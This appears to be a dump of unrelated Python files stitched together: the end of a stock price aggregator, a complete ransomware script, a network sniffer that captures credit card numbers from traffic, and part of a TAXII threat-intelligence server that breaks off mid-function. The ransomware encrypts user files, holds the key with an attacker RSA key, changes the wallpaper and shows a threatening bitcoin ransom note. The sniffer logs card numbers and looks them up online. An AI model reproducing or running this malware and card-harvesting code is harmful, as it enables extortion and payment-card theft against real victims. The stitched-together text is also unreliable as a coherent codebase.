dt = datetime.fromtimestamp(timestamp)
update = self.__UpdateCassandraStock()
for symbol in OHLCs.keys():
# Convert dict to json so that it can be insert into Cassandra table
OHLC_json = json.dumps(OHLCs[symbol])
batch.add(update, (OHLC_json, symbol, self.interval_type, dt))
# Update H and L
self.H[symbol] = max(OHLCs[symbol]['high'], self.H[symbol])
self.L[symbol] = min(OHLCs[symbol]['low'], self.L[symbol])
elif self.queue and timestamp - self.queue[-1]['timestamp'] < 10 * self.interval:
# the timestamp that is less than or equal to the current timestamp, in a certain range
# supplement the intermediate missing data
latest = self.queue[-1]['timestamp']
insert = self.__InsertCassandraStock()
for t in range((timestamp - latest)//self.interval):
ts = latest + (t+1) * self.interval
self.queue.append({'OHLCs':OHLCs, 'timestamp':ts})
dt = datetime.fromtimestamp(ts)
for symbol in OHLCs.keys():
OHLC_json = json.dumps(OHLCs[symbol])
batch.add(insert, (OHLC_json, symbol, self.interval_type, dt))
if t < 1:
# Because they are all same values, so update H and L only once
self.H[symbol] = max(OHLCs[symbol]['high'], self.H[symbol])
self.L[symbol] = min(OHLCs[symbol]['low'], self.L[symbol])
else:
self.queue.append({'OHLCs':OHLCs, 'timestamp':timestamp})
dt = datetime.fromtimestamp(timestamp)
insert = self.__InsertCassandraStock()
for symbol in OHLCs.keys():
OHLC_json = json.dumps(OHLCs[symbol])
batch.add(insert, (OHLC_json, symbol, self.interval_type, dt))
# Update H and L
self.H[symbol] = max(OHLCs[symbol]['high'], self.H[symbol])
self.L[symbol] = min(OHLCs[symbol]['low'], self.L[symbol])
while stack:
self.queue.append(stack.pop())
# Pop the exceeded data out if the queue is full
# Delete the data being pop out from Cassandra table
delete = self.__DeleteCassandraStock()
while len(self.queue) > self.length:
del_data = self.queue.popleft()
dt = datetime.fromtimestamp(del_data['timestamp'])
for symbol in del_data['OHLCs'].keys():
batch.add(delete, (symbol, self.interval_type, dt))
self.c_session.execute(batch)
batch.clear()
def extract(self):
OHLCs = {}
if len(self.queue) >= 60:
O = self.queue[-60]['OHLCs']
else:
O = self.queue[0]['OHLCs']
C = self.queue[-1]['OHLCs']
for symbol in O.keys():
OHLCs[symbol] = {'close':{'price':C[symbol]['close']['price'], 'time':C[symbol]['close']['time']},
'open':{'price':O[symbol]['open']['price'], 'time':O[symbol]['open']['time']},
'high':self.H[symbol],
'low':self.L[symbol],
'symbol':symbol,
'volume':C[symbol]['volume']}
self.H[symbol] = 0
self.L[symbol] = float('inf')
return OHLCs
### Repeated program runner with accurate execution interval
class RepeatedTimer:
# Repeat function every interval seconds, stop after a given number of seconds
def __init__(self, interval, stop_after, function, *args, **kwargs):
self.interval = interval
self.function = function
self.args = args
self.kwargs = kwargs
self.start = time.time()
self.stop_at = self.start + stop_after
self.event = Event()
self.thread = Thread(target=self._target)
self.thread.start()
def _target(self):
while not self.event.wait(self._time):
if time.time() > self.stop_at:
break
self.function(*self.args, **self.kwargs)
@property
def _time(self):
return self.interval - ((time.time() - self.start) % self.interval)
def stop(self):
self.event.set()
self.thread.join()
|
GASRansomwareByModification.py
|
# Imports
import os # to get system root
import webbrowser # to load webbrowser to go to specific website eg bitcoin
import ctypes # so we can intereact with windows dlls and change windows background etc
import urllib.request # used for downloading and saving background image
import requests # used to make get reqeust to api.ipify.org to get target machine ip addr
import time # used to time.sleep interval for ransom note & check desktop to decrypt system/files
import datetime # to give time limit on ransom note
import win32gui
import subprocess # to create process for notepad and open ransom note
import threading # used for ransom note and decryption key on dekstop
from cryptography.fernet import Fernet # encrypt/decrypt files on target system
from Crypto.PublicKey import RSA
from Crypto.Random import get_random_bytes
from Crypto.Cipher import AES, PKCS1_OAEP
import base64
class RansomWare:
localRoot: str
# File exstensions to seek out and Encrypt
file_exts = [
'txt',
# We comment out 'png' so that we can see the RansomWare only encrypts specific files that we have chosen-
# -and leaves other files un-ecnrypted etc.
# 'png',
]
def __init__(self):
# Key that will be used for Fernet object and encrypt/decrypt method
self.key = None
# Encrypt/Decrypter
self.crypter = None
# RSA public key used for encrypting/decrypting fernet object eg, Symmetric key
self.public_key = None
''' Root directorys to start Encryption/Decryption from
CAUTION: Do NOT use self.sysRoot on your own PC as you could end up messing up your system etc...
CAUTION: Play it safe, create a mini root directory to see how this software works it is no different
CAUTION: eg, use 'localRoot' and create Some folder directory and files in them folders etc.
'''
# Use sysroot to create absolute path for files, etc. And for encrypting whole system
self.sysRoot = os.path.expanduser('~')
# Use localroot to test encryption softawre and for absolute path for files and encryption of "test system"
self.localRoot = 'C:\\Users\\jojo\\Desktop\\test\\' # Debugging/Testing
# Get public IP of person, for more analysis etc. (Check if you have hit gov, military ip space LOL)
self.publicIP = requests.get('https://api.ipify.org').text
# Generates [SYMMETRIC KEY] on victim machine which is used to encrypt the victims data
def generate_key(self):
# Generates a url safe(base64 encoded) key
self.key = Fernet.generate_key()
# Creates a Fernet object with encrypt/decrypt methods
self.crypter = Fernet(self.key)
# Write the fernet(symmetric key) to text file
def write_key(self):
with open('fernet_key.txt', 'wb') as f:
f.write(self.key)
# Encrypt [SYMMETRIC KEY] that was created on victim machine to Encrypt/Decrypt files with our PUBLIC ASYMMETRIC-
# -RSA key that was created on OUR MACHINE. We will later be able to DECRYPT the SYSMETRIC KEY used for-
# -Encrypt/Decrypt of files on target machine with our PRIVATE KEY, so that they can then Decrypt files etc.
def encrypt_fernet_key(self):
with open('fernet_key.txt', 'rb') as fk:
fernet_key = fk.read()
with open('fernet_key.txt', 'wb') as f:
# Public RSA key
self.public_key = RSA.import_key(open('public.pem').read())
# Public encrypter object
public_crypter = PKCS1_OAEP.new(self.public_key)
# Encrypted fernet key
enc_fernent_key = public_crypter.encrypt(fernet_key)
# Write encrypted fernet key to file
f.write(enc_fernent_key)
# Write encrypted fernet key to dekstop as well so they can send this file to be unencrypted and get system/files back
with open(f'{self.sysRoot}/Desktop/EMAIL_ME.txt', 'wb') as fa:
fa.write(enc_fernent_key)
# Assign self.key to encrypted fernet key
self.key = enc_fernent_key
# Remove fernet crypter object
self.crypter = None
# [SYMMETRIC KEY] Fernet Encrypt/Decrypt file - file_path:str:absolute file path eg, C:/Folder/Folder/Folder/Filename.txt
def crypt_file(self, file_path, encrypted=False):
with open(file_path, 'rb') as f:
# Read data from file
data = f.read()
if not encrypted:
# Print file contents - [debugging]
print(data)
# Encrypt data from file
_data = self.crypter.encrypt(data)
# Log file encrypted and print encrypted contents - [debugging]
print('> File encrpyted')
print(_data)
else:
# Decrypt data from file
_data = self.crypter.decrypt(data)
# Log file decrypted and print decrypted contents - [debugging]
print('> File decrpyted')
print(_data)
with open(file_path, 'wb') as fp:
# Write encrypted/decrypted data to file using same filename to overwrite original file
fp.write(_data)
# [SYMMETRIC KEY] Fernet Encrypt/Decrypt files on system using the symmetric key that was generated on victim machine
def crypt_system(self, encrypted=False):
# put all the file names that are in the directory in a list
files = os.listdir(self.localRoot)
c = 0
# append the whole path to each file name
for i in files:
files[c] = self.localRoot + i
c += 1
# sorting the files by (size, creation/last modification)
files.sort(key=lambda f: os.stat(f).st_mtime, reverse=False)
for file in files:
# check the extension of the file
if not file.split('.')[-1] in self.file_exts:
continue
if not encrypted:
time.sleep(0.2)
self.crypt_file(file)
else:
self.crypt_file(file, encrypted=True)
@staticmethod
def what_is_bitcoin():
url = 'https://bitcoin.org'
# Open browser to the https://bitcoin.org so they know what bitcoin is
webbrowser.open(url)
def change_desktop_background(self):
imageUrl = 'https://techgenix.com/tgwordpress/wp-content/uploads/2016/09/Guy-fawkes-e1474441663786.png'
# Go to specif url and download+save image using absolute path
path = f'{self.sysRoot}/Desktop/background.jpg'
urllib.request.urlretrieve(imageUrl, path)
SPI_SETDESKWALLPAPER = 20
# Access windows dlls for funcionality eg, changing dekstop wallpaper
ctypes.windll.user32.SystemParametersInfoW(SPI_SETDESKWALLPAPER, 0, path, 0)
def ransom_note(self):
date = datetime.date.today().strftime('%d-%B-Y')
with open('RANSOM_NOTE.txt', 'w') as f:
f.write(f'''
The harddisks of your computer have been encrypted with an Military grade encryption algorithm.
There is no way to restore your data without a special key.
Only we can decrypt your files!
To purchase your key and restore your data, please follow these three easy steps:
1. Email the file called EMAIL_ME.txt at {self.sysRoot}Desktop/EMAIL_ME.txt to GetYourFilesBack@protonmail.com
2. You will recieve your personal BTC address for payment.
Once payment has been completed, send another email to GetYourFilesBack@protonmail.com stating "PAID".
We will check to see if payment has been paid.
3. You will receive a text file with your KEY that will unlock all your files.
IMPORTANT: To decrypt your files, place text file on desktop and wait. Shortly after it will begin to decrypt all files.
WARNING:
Do NOT attempt to decrypt your files with any software as it is obselete and will not work, and may cost you more to unlcok your files.
Do NOT change file names, mess with the files, or run deccryption software as it will cost you more to unlock your files-
-and there is a high chance you will lose your files forever.
Do NOT send "PAID" button without paying, price WILL go up for disobedience.
Do NOT think that we wont delete your files altogether and throw away the key if you refuse to pay. WE WILL.
''')
def show_ransom_note(self):
# Open the ransom note
ransom = subprocess.Popen(['notepad.exe', 'RANSOM_NOTE.txt'])
count = 0 # Debugging/Testing
while True:
time.sleep(0.1)
top_window = win32gui.GetWindowText(win32gui.GetForegroundWindow())
if top_window == 'RANSOM_NOTE - Notepad':
print('Ransom note is the top window - do nothing') # Debugging/Testing
pass
else:
print('Ransom note is not the top window - kill/create process again') # Debugging/Testing
# Kill ransom note so we can open it agian and make sure ransom note is in ForeGround (top of all windows)
time.sleep(0.1)
ransom.kill()
# Open the ransom note
time.sleep(0.1)
ransom = subprocess.Popen(['notepad.exe', 'RANSOM_NOTE.txt'])
# sleep for 10 seconds
time.sleep(10)
count += 1
if count == 1:
break
# Decrypts system when text file with un-encrypted key in it is placed on dekstop of target machine
def put_me_on_desktop(self):
# Loop to check file and if file it will read key and then self.key + self.cryptor will be valid for decrypting-
# -the files
print('started') # Debugging/Testing
while True:
try:
print('trying') # Debugging/Testing
# The ATTACKER decrypts the fernet symmetric key on their machine and then puts the un-encrypted fernet-
# -key in this file and sends it in a email to victim. They then put this on the desktop and it will be-
# -used to un-encrypt the system. AT NO POINT DO WE GIVE THEM THE PRIVATE ASSYEMTRIC KEY etc.
with open(f'{self.sysRoot}/Desktop/PUT_ME_ON_DESKTOP.txt', 'r') as f:
self.key = f.read()
self.crypter = Fernet(self.key)
# Decrpyt system once have file is found and we have cryptor with the correct key
self.crypt_system(encrypted=True)
print('decrypted') # Debugging/Testing
break
except Exception as e:
print(e) # Debugging/Testing
pass
time.sleep(5) # Debugging/Testing check for file on desktop ever 10 seconds
print('Checking for PUT_ME_ON_DESKTOP.txt') # Debugging/Testing
# Would use below code in real life etc... above 10secs is just to "show" concept
# Sleep ~ 3 mins
# secs = 60
# mins = 3
# time.sleep((mins*secs))
def main():
# testfile = r'D:\Coding\Python\RansomWare\RansomWare_Software\testfile.png'
rw = RansomWare()
rw.generate_key()
rw.crypt_system()
rw.write_key()
rw.encrypt_fernet_key()
rw.change_desktop_background()
rw.what_is_bitcoin()
rw.ransom_note()
t1 = threading.Thread(target=rw.show_ransom_note)
t2 = threading.Thread(target=rw.put_me_on_desktop)
t1.start()
print('> RansomWare: Attack completed on target machine and system is encrypted') # Debugging/Testing
print(
'> RansomWare: Waiting for attacker to give target machine document that will un-encrypt machine') # Debugging/Testing
t2.start()
print('> RansomWare: Target machine has been un-encrypted') # Debugging/Testing
print('> RansomWare: Completed') # Debugging/Testing
if __name__ == '__main__':
main()
|
CCWatcher.py
|
import re
import sys
import logging
import argparse
import requests
from scapy.all import *
from colorama import init
from threading import Thread
from termcolor import colored
#Color Windows
init()
logging.basicConfig(level=logging.INFO)
logger = logging.getLogger(__name__)
def arguments():
parser = argparse.ArgumentParser(description = 'Network Sniffer Tool, to find unencrypted Credit Card data.')
parser.add_argument('-i', '--iface', action = 'store', dest = 'iface',required = True, help = 'Interface to sniff')
parser.add_argument('-f', '--filter', action = 'store', dest = 'filter', default='tcp', required = False, help = 'Filter in wireshark style. Ex.: "tcp and port 80"')
parser.add_argument('-rf', '--regex-file', action = 'store', dest = 'regex_file', default='regex_cc.txt',required = False, help = 'Regex to find another informations')
parser.add_argument('-r', '--regex', action = 'store', dest = 'regex', required = False, help = 'File with regex rules to find Credit Card')
parser.add_argument('-o', '--output', action = 'store', dest = 'output', default='credit_cards_output.txt',required = False, help = 'Output file where creditcards infos will be stored')
parser.add_argument('-l', '--log', action = 'store', dest = 'log', default='ccwatcher.log',required = False, help = 'Output file where log will be stored')
return parser.parse_args()
def save_cc(results):
for result in results:
f = open(args.output,'a')
f.write('Credit Card number: '+result+'\n')
url = 'https://binlist.net/json/%s' % result
r = requests.get(url)
for key,value in r.json().items():
msg = '%s\t\t\t%s\n' % (key,value)
f.write(msg)
f.write('-'*50+'\n')
f.close()
def regex_gen():
if args.regex:
return re.compile(args.regex)
else:
x = dict()
for regex in open(args.regex_file):
regex = regex.split(':',1)
x[regex[0]]=regex[1]
return x
def verify(data):
for cc,pattern in patterns.items():
result = re.findall(pattern.strip(),data,re.MULTILINE)
if len(result) > 0:
t = Thread(target=save_cc, args=(result,))
t.start()
return result
def monitor(pkt):
data = str()
if 'TCP' in pkt and pkt[TCP].payload:data = str(pkt[TCP].payload)
elif pkt.getlayer(Raw):data = pkt.getlayer(Raw).load
if data:
cc = verify(data)
if cc:
logger.info(colored('\nCredit Cards Numbers\n%s', 'white', 'on_green') % ' | '.join(cc))
logger.info("\n%s:%s============>%s:%s" % (pkt[IP].src,pkt[IP].sport,pkt[IP].dst,pkt[IP].dport))
logger.info("\n"+data)
args = arguments()
# create a file handler
handler = logging.FileHandler(args.log)
handler.setLevel(logging.INFO)
logger.addHandler(handler)
patterns = regex_gen()
sniff(prn=monitor,iface=args.iface,filter=args.filter,count=0)
|
TAXIIServer.py
|
import demistomock as demisto
from CommonServerPython import *
from flask import Flask, request, make_response, Response, stream_with_context
from gevent.pywsgi import WSGIServer
from urllib.parse import urlparse, ParseResult
from tempfile import NamedTemporaryFile
from base64 import b64decode
from typing import Callable, List, Generator
from ssl import SSLContext, SSLError, PROTOCOL_TLSv1_2
from multiprocessing import Process
from werkzeug.datastructures import Headers
from libtaxii.messages_11 import (
TAXIIMessage,
DiscoveryRequest,
DiscoveryResponse,
CollectionInformationRequest,
CollectionInformation,
CollectionInformationResponse,
PollRequest,
PollingServiceInstance,
ServiceInstance,
ContentBlock,
generate_message_id,
get_message_from_xml)
from libtaxii.constants import (
MSG_COLLECTION_INFORMATION_REQUEST,
MSG_DISCOVERY_REQUEST,
MSG_POLL_REQUEST,
SVC_DISCOVERY,
SVC_COLLECTION_MANAGEMENT,
SVC_POLL,
CB_STIX_XML_11
)
from cybox.core import Observable
from requests.utils import requote_uri
import functools
import stix.core
import stix.indicator
import stix.extensions.marking.ais
import stix.data_marking
import stix.extensions.marking.tlp
import cybox.objects.address_object
import cybox.objects.domain_name_object
import cybox.objects.uri_object
import cybox.objects.file_object
import mixbox.idgen
import mixbox.namespaces
import netaddr
import uuid
import werkzeug.urls
import pytz
''' GLOBAL VARIABLES '''
INTEGRATION_NAME: str = 'TAXII Server'
PAGE_SIZE = 200
APP: Flask = Flask('demisto-taxii')
NAMESPACE_URI = 'https://www.paloaltonetworks.com/cortex'
NAMESPACE = 'cortex'
''' Log Handler '''
class Handler:
@staticmethod
def write(message):
"""
Writes a log message to the Demisto server.
Args:
message: The log message to write
"""
demisto.info(message)
''' TAXII Server '''
class TAXIIServer:
def __init__(self, url_scheme: str, host: str, port: int, collections: dict, certificate: str, private_key: str,
http_server: bool, credentials: dict, service_address: Optional[str] = None):
"""
Class for a TAXII Server configuration.
Args:
url_scheme: The URL scheme (http / https)
host: The server address.
port: The server port.
collections: The JSON string of collections of indicator queries.
certificate: The server certificate for SSL.
private_key: The private key for SSL.
http_server: Whether to use HTTP server (not SSL).
credentials: The user credentials.
"""
self.url_scheme = url_scheme
self.host = host
self.port = port
self.collections = collections
self.certificate = certificate
self.private_key = private_key
self.http_server = http_server
self.service_address = service_address
self.auth = None
if credentials:
self.auth = (credentials.get('identifier', ''), credentials.get('password', ''))
self.service_instances = [
{
'type': SVC_DISCOVERY,
'path': 'taxii-discovery-service'
},
{
'type': SVC_COLLECTION_MANAGEMENT,
'path': 'taxii-collection-management-service'
},
{
'type': SVC_POLL,
'path': 'taxii-poll-service'
}
]
def get_discovery_service(self, taxii_message: DiscoveryRequest, request_headers: Headers) -> DiscoveryResponse:
"""
Handle discovery request.
Args:
taxii_message: The discovery request message.
request_headers: The request headers
Returns:
The discovery response.
"""
if taxii_message.message_type != MSG_DISCOVERY_REQUEST:
raise ValueError('Invalid message, invalid Message Type')
discovery_service_url = self.get_url(request_headers)
discovery_response = DiscoveryResponse(
generate_message_id(),
taxii_message.message_id
)
for instance in self.service_instances:
instance_type = instance['type']
instance_path = instance['path']
taxii_service_instance = ServiceInstance(
instance_type,
'urn:taxii.mitre.org:services:1.1',
'urn:taxii.mitre.org:protocol:http:1.0',
f'{discovery_service_url}/{instance_path}',
['urn:taxii.mitre.org:message:xml:1.1'],
available=True
)
discovery_response.service_instances.append(taxii_service_instance)
return discovery_response
def get_collections(self,
taxii_message: CollectionInformationRequest,
request_headers: Headers,
) -> CollectionInformationResponse:
"""
Handle collection management request.
Args:
taxii_message: The collection request message.
request_headers: The request headers
Returns:
The collection management response.
"""
taxii_feeds = list(self.collections.keys())
url = self.get_url(request_headers)
if taxii_message.message_type != MSG_COLLECTION_INFORMATION_REQUEST:
raise ValueError('Invalid message, invalid Message Type')
collection_info_response = CollectionInformationResponse(
generate_message_id(),
taxii_message.message_id
)
for feed in taxii_feeds:
collection_info = CollectionInformation(
feed,
f'{feed} Data Feed',
['urn:stix.mitre.org:xml:1.1.1'],
True
)
polling_instance = PollingServiceInstance(
'urn:taxii.mitre.org:protocol:http:1.0',
f'{url}/taxii-poll-service',
['urn:taxii.mitre.org:message:xml:1.1']
)
collection_info.polling_service_instances.append(polling_instance)
collection_info_response.collection_informations.append(collection_info)
return collection_info_response
def get_poll_response(self, taxii_message: PollRequest) -> Response:
"""
Handle poll request.
Args:
taxii_message: The poll request message.
Returns:
The poll response.
"""
if taxii_message.message_type != MSG_POLL_REQUEST:
raise ValueError('Invalid message, invalid Message Type')
taxii_feeds = list(self.collections.keys())
collection_name = taxii_message.collection_name
exclusive_begin_time = taxii_message.exclusive_begin_timestamp_label
inclusive_end_time = taxii_message.inclusive_end_timestamp_label
return self.stream_stix_data_feed(taxii_feeds, taxii_message.message_id, collection_name,
exclusive_begin_time, inclusive_end_time)
def stream_stix_data_feed(self, taxii_feeds: list, message_id: str, collection_name: str,
exclusive_begin_time: datetime, inclusive_end_time: datetime) -> Response:
"""
Get the indicator query results in STIX data feed format.
Args:
taxii_feeds: The available taxii feeds according to the collections.
message_id: The taxii message ID.
collection_name: The collection name to get the indicator query from.
exclusive_begin_time: The query exclusive begin time.
inclusive_end_time: The query inclusive end time.
Returns:
Stream of STIX indicator data feed.
"""
if collection_name not in taxii_feeds:
raise ValueError('Invalid message, unknown feed')
if not inclusive_end_time:
inclusive_end_time = datetime.utcnow().replace(tzinfo=pytz.utc)
def yield_response() -> Generator:
"""
Streams the STIX indicators as XML string.
"""
# yield the opening tag of the Poll Response
response = '<taxii_11:Poll_Response xmlns:taxii="http://taxii.mitre.org/messages/taxii_xml_binding-1"' \
' xmlns:taxii_11="http://taxii.mitre.org/messages/taxii_xml_binding-1.1" ' \
'xmlns:tdq="http://taxii.mitre.org/query/taxii_default_query-1"' \
f' message_id="{generate_message_id()}"' \
f' in_response_to="{message_id}"' \
f' collection_name="{collection_name}" more="false" result_part_number="1"> ' \
f'<taxii_11:Inclusive_End_Timestamp>{inclusive_end_time.isoformat()}' \
'</taxii_11:Inclusive_End_Timestamp>'
if exclusive_begin_time is not None:
response += (f'<taxii_11:Exclusive_Begin_Timestamp>{exclusive_begin_time.isoformat()}'
f'</taxii_11:Exclusive_Begin_Timestamp>')
yield response
# yield the content blocks
indicator_query = self.collections[str(collection_name)]
for indicator in find_indicators_by_time_frame(indicator_query, exclusive_begin_time, inclusive_end_time):
try:
stix_xml_indicator = get_stix_indicator(indicator).to_xml(ns_dict={NAMESPACE_URI: NAMESPACE})
content_block = ContentBlock(
content_binding=CB_STIX_XML_11,
content=stix_xml_indicator
)
content_xml = content_block.to_xml().decode('utf-8')
yield f'{content_xml}\n'
except Exception as e:
handle_long_running_error(f'Failed parsing indicator to STIX: {e}')
# yield the closing tag
yield '</taxii_11:Poll_Response>'
return Response(
response=stream_with_context(yield_response()),
status=200,
headers={
'X-TAXII-Content-Type': 'urn:taxii.mitre.org:message:xml:1.1',
'X-TAXII-Protocol': 'urn:taxii.mitre.org:protocol:http:1.0'
},
mimetype='application/xml'
)
def get_url(self, request_headers: Headers) -> str:
"""
Args:
request_headers: The request headers
Returns:
The service URL according to the protocol.
"""
if self.service_address:
return self.service_address
if request_headers and '/instance/execute' in request_headers.get('X-Request-URI', ''):
# if the server rerouting is used, then the X-Request-URI header is added to the request by the server
# and we should use the /instance/execute endpoint in the address
self.url_scheme = 'https'
calling_context = get_calling_context()
instance_name = calling_context.get('IntegrationInstance', '')
endpoint = requote_uri(os.path.join('/instance', 'execute', instance_name))
else:
endpoint = f':{self.port}'
return f'{self.url_scheme}://{self.host}{endpoint}'
SERVER: TAXIIServer
DEMISTO_LOGGER: Handler = Handler()
''' STIX MAPPING '''
def create_stix_ip_observable(namespace: str, indicator: dict) -> List[Observable]:
"""
Create STIX IP observable.
Args:
namespace: The XML namespace .
indicator: The Demisto IP indicator.
Returns:
STIX IP observable.
"""
category = cybox.objects.address_object.Address.CAT_IPV4
type_ = indicator.get('indicator_type', '')
value = indicator.get('value', '')
if type_ in [FeedIndicatorType.IPv6, FeedIndicatorType.IPv6CIDR]:
category = cybox.objects.address_object.Address.CAT_IPV6
indicator_values = [value]
if '-' in value:
# looks like an IP Range, let's try to make it a CIDR
a1, a2 = value.split('-', 1)
if a1 == a2:
# same IP
indicator_values = [a1]
else:
# use netaddr builtin algo to summarize range into CIDR
iprange = netaddr.IPRange(a1, a2)
cidrs = iprange.cidrs()
indicator_values = list(map(str, cidrs))
observables = []
for indicator_value in indicator_values:
id_ = f'{namespace}:observable-{uuid.uuid4()}'
address_object = cybox.objects.address_object.Address(
address_value=indicator_value,
category=category
)
observable = Observable(
title=f'{type_}: {indicator_value}',
id_=id_,
item=address_object
)
observables.append(observable)
return observables
def create_stix_email_observable(namespace: str, indicator: dict) -> List[Observable]:
"""
Create STIX Email observable.
Args:
namespace: The XML namespace.
indicator: The Demisto Email indicator.
Returns:
STIX Email observable.
"""
category = cybox.objects.address_object.Address.CAT_EMAIL
type_ = indicator.get('indicator_type', '')
value = indicator.get('value', '')
id_ = f'{namespace}:observable-{uuid.uuid4()}'
email_object = cybox.objects.address_object.Address(
address_value=indicator.get('value', ''),
category=category
)
observable = Observable(
title=f'{type_}: {value}',
id_=id_,
item=email_object
)
return [observable]
def create_stix_domain_observable(namespace, indicator):
"""
Create STIX Domain observable.
Args:
namespace: The XML namespace.
indicator: The Demisto Domain indicator.
Returns:
STIX Domain observable.
"""
id_ = f'{namespace}:observable-{uuid.uuid4()}'
value = indicator.get('value', '')
domain_object = cybox.objects.domain_name_object.DomainName()
domain_object.value = value
domain_object.type_ = 'FQDN'
observable = Observable(
title=f'FQDN: {value}',
id_=id_,
item=domain_object
)
return [observable]
def create_stix_url_observable(namespace, indicator):
"""
Create STIX URL observable.
Args:
namespace: The XML namespace.
indicator: The Demisto URL indicator.
Returns:
STIX URL observable.
"""
id_ = f'{namespace}:observable-{uuid.uuid4()}'
value = indicator.get('value', '')
uri_object = cybox.objects.uri_object.URI(
value=value,
type_=cybox.objects.uri_object.URI.TYPE_URL
)
observable = Observable(
title=f'URL: {value}',
id_=id_,
item=uri_object
)
return [observable]
def create_stix_hash_observable(namespace, indicator):
"""
Create STIX file observable.
Args:
namespace: The XML namespace.
indicator: The Demisto File indicator.
Returns:
STIX File observable.
"""
id_ = f'{namespace}:observable-{uuid.uuid4()}'
value = indicator.get('value', '')
type_ = indicator.get('indicator_type', '')
file_object = cybox.objects.file_object.File()
file_object.add_hash(indicator)
observable = Observable(
title=f'{value}: {type_}',
id_=id_,
item=file_object
)
return [observable]
TYPE_MAPPING = {
FeedIndicatorType.IP: {
'indicator_type': stix.common.vocabs.IndicatorType.TERM_IP_WATCHLIST,
'mapper': create_stix_ip_observable
},
FeedIndicatorType.CIDR: {
'indicator_type': stix.common.vocabs.IndicatorType.TERM_IP_WATCHLIST,
'mapper': create_stix_ip_observable
},
FeedIndicatorType.IPv6: {
'indicator_type': stix.common.vocabs.IndicatorType.TERM_IP_WATCHLIST,
'mapper': create_stix_ip_observable
},
FeedIndicatorType.IPv6CIDR: {
'indicator_type': stix.common.vocabs.IndicatorType.TERM_IP_WATCHLIST,
'mapper': create_stix_ip_observable
},
FeedIndicatorType.URL: {
'indicator_type': stix.common.vocabs.IndicatorType.TERM_URL_WATCHLIST,
'mapper': create_stix_url_observable
},
FeedIndicatorType.Domain: {
'indicator_type': stix.common.vocabs.IndicatorType.TERM_DOMAIN_WATCHLIST,
'mapper': create_stix_domain_observable
},
FeedIndicatorType.File: {
'indicator_type': stix.common.vocabs.IndicatorType.TERM_FILE_HASH_WATCHLIST,
'mapper': create_stix_hash_observable
},
FeedIndicatorType.Email: {
'indicator_type': stix.common.vocabs.IndicatorType.TERM_MALICIOUS_EMAIL,
'mapper': create_stix_email_observable
}
}
def set_id_namespace(uri: str, name: str):
"""
Set the XML namespace.
Args:
uri: The namespace URI.
name: The namespace name.
"""
namespace = mixbox.namespaces.Namespace(uri, name)
mixbox.idgen.set_id_namespace(namespace)
def get_stix_indicator(indicator: dict) -> stix.core.STIXPackage:
"""
Convert a Demisto indicator to STIX.
Args:
indicator: The Demisto indicator.
Returns:
The STIX indicator as XML string.
"""
set_id_namespace(NAMESPACE_URI, NAMESPACE)
type_ = indicator.get('indicator_type', '')
type_mapper: dict = TYPE_MAPPING.get(type_, {})
value = indicator.get('value', '')
source = indicator.get('sourceBrands', [])
sources = ','.join(source)
handling = None
# Add TLP if available
share_level = indicator.get('trafficlightprotocol', '').upper()
if share_level and share_level in ['WHITE', 'GREEN', 'AMBER', 'RED']:
marking_specification = stix.data_marking.MarkingSpecification()
marking_specification.controlled_structure = "//node() | //@*"
tlp = stix.extensions.marking.tlp.TLPMarkingStructure()
tlp.color = share_level
marking_specification.marking_structures.append(tlp)
handling = stix.data_marking.Marking()
handling.add_marking(marking_specification)
header = None
if handling is not None:
header = stix.core.STIXHeader(
handling=handling
)
# Create the STIX package
package_id = f'{NAMESPACE}:observable-{uuid.uuid4()}'
stix_package = stix.core.STIXPackage(id_=package_id, stix_header=header)
# Get the STIX observables according to the indicator mapper
observables = type_mapper['mapper'](NAMESPACE, indicator)
# Create the STIX indicator
for observable in observables:
id_ = f'{NAMESPACE}:indicator-{uuid.uuid4()}'
if type_ == 'URL':
indicator_value = werkzeug.urls.iri_to_uri(value, safe_conversion=True)
else:
indicator_value = value
stix_indicator = stix.indicator.indicator.Indicator(
id_=id_,
title=f'{type_}: {indicator_value}',
description=f'{type_} indicator from {sources}',
timestamp=datetime.utcnow().replace(tzinfo=pytz.utc)
)
# Confidence is mapped by the indicator score
confidence = 'Low'
indicator_score = indicator.get('score')
if indicator_score is None:
demisto.error(f'indicator without score: {value}')
stix_indicator.confidence = "Unknown"
else:
score = int(indicator.get('score', 0))
if score < 2:
pass
elif score < 3:
confidence = 'Medium'
else:
confidence = 'High'
stix_indicator.confidence = confidence
stix_indicator.add_indicator_type(type_mapper['indicator_type'])
stix_indicator.add_observable(observable)
stix_package.add_indicator(stix_indicator)
return stix_package
''' HELPER FUNCTIONS '''
def get_calling_context():
return demisto.callingContext.get('context', {}) # type: ignore[attr-defined]
def handle_long_running_error(error: str):
"""
Handle errors in the long running process.
Args:
error: The error message.
"""
demisto.error(error)
demisto.updateModuleHealth(error)
def validate_credentials(f: Callable) -> Callable:
"""
Wrapper function of HTTP requests to validate authentication headers.
Args:
f: The wrapped function.
Returns:
The function result (if the authentication is valid).
"""
@functools.wraps(f)
def validate(*args, **kwargs):
headers = request.headers
if SERVER.auth:
credentials: str = headers.get('Authorization', '')
if not credentials or 'Basic ' not in credentials:
return make_response('Invalid authentication', 401)
encoded_credentials: str = credentials.split('Basic ')[1]
credentials: str = b64decode(encoded_credentials).decode('utf-8')
if ':' not in credentials:
return make_response('Invalid authentication', 401)
credentials_list = credentials.split(':')
if len(credentials_list) != 2:
return make_response('Invalid authentication', 401)
username, password = credentials_list
if not (username == SERVER.auth[0] and password == SERVER.auth[1]):
return make_response('Invalid authentication', 401)
return f(*args, **kwargs)
return validate
def taxii_check(f: Callable) -> Callable:
"""
Wrapper function of HTTP requests to validate taxii headers.
Args:
f: The wrapped function.
Returns:
The function result (if the headers are valid).
"""
@functools.wraps(f)
def check(*args, **kwargs):
taxii_content_type = request.headers.get('X-TAXII-Content-Type', None)
if taxii_content_type not in ['urn:taxii.mitre.org:message:xml:1.1', 'urn:taxii.mitre.org:message:xml:1.0']:
return make_response('Invalid TAXII Headers', 400)
taxii_content_type = request.headers.get('X-TAXII-Protocol', None)
if taxii_content_type not in ['urn:taxii.mitre.org:protocol:http:1.0',
'urn:taxii.mitre.org:protocol:https:1.0']:
return make_response('Invalid TAXII Headers', 400)
taxii_content_type = request.headers.get('X-TAXII-Services', None)
if taxii_content_type not in ['urn:taxii.mitre.org:services:1.1', 'urn:taxii.mitre.org:services:1.0']:
return make_response('Invalid TAXII Headers', 400)
return f(*args, **kwargs)
return check
def get_port(params: dict = demisto.params()) -> int:
"""
Gets port from the integration parameters.
"""
port_mapping: str = params.get('longRunningPort', '')
port: int
if port_mapping:
if ':' in port_mapping:
port = int(port_mapping.split(':')[1])
else:
